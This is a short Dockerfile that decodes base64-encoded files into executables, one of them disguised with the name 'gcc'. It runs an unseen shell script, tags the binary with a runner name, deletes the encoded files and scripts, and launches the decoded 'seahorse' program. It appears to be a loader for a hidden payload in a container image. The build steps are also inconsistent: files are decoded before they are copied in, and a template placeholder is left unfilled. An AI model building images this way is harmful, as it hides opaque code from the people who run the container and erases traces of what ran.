FROM ubuntu
WORKDIR /workdir
ENV DEBIAN_FRONTEND noninteractive

RUN bash -c 'echo $(date +%s) > seahorse.log'

RUN base64 --decode seahorse.64 > seahorse
RUN base64 --decode gcc.64 > gcc

RUN chmod +x gcc

COPY seahorse .
COPY docker.sh .
COPY gcc .

RUN sed --in-place 's/__RUNNER__/dockerhub-b/g' seahorse
RUN bash ./docker.sh

RUN rm --force --recursive seahorse _REPO_NAME__.64 docker.sh gcc gcc.64

CMD seahorse
